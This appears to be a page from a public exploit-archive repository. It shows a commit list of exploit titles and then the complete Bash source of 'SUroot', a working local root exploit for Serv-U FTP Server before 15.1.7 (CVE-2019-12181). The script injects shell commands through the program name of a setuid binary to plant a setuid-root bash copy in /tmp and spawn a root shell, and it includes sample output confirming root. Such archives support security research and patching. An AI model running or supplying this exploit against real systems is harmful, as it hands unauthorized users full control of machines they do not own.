6f49190671
19 changes to exploits/shellcodes pdfresurrect 0.15 - Buffer Overflow Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method) Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method) Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method) Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method) Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation VMware Workstation/Player < 12.5.5 - Local Privilege Escalation S-nail < 14.8.16 - Local Privilege Escalation Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2) ASAN/SUID - Local Privilege Escalation Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation Ovidentia 8.4.3 - SQL Injection Moodle Filepicker 3.5.2 - Server Side Request Forgery Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit) Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection
37 lines
No EOL
1.2 KiB
Bash
Executable file
37 lines
No EOL
1.2 KiB
Bash
Executable file
#!/bin/bash
|
|
# SUroot - Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)
|
|
# Bash variant of Guy Levin's Serv-U FTP Server exploit:
|
|
# - https://github.com/guywhataguy/CVE-2019-12181
|
|
# ---
|
|
# user@debian-9-6-0-x64-xfce:~/Desktop$ ./SUroot
|
|
# [*] Launching Serv-U ...
|
|
# sh: 1: : Permission denied
|
|
# [+] Success:
|
|
# -rwsr-xr-x 1 root root 117208 Jun 28 23:21 /tmp/sh
|
|
# [*] Launching root shell: /tmp/sh
|
|
# sh-4.4# id
|
|
# uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),117(scanner)
|
|
# ---
|
|
# <bcoles@gmail.com>
|
|
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181
|
|
|
|
if ! test -u "/usr/local/Serv-U/Serv-U"; then
|
|
echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
|
|
exit 1
|
|
fi
|
|
|
|
echo "[*] Launching Serv-U ..."
|
|
|
|
/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
|
|
|
|
if ! test -u "/tmp/sh"; then
|
|
echo '[-] Failed'
|
|
/bin/rm "/tmp/sh"
|
|
exit 1
|
|
fi
|
|
|
|
echo '[+] Success:'
|
|
/bin/ls -la /tmp/sh
|
|
|
|
echo "[*] Launching root shell: /tmp/sh"
|
|
/tmp/sh -p |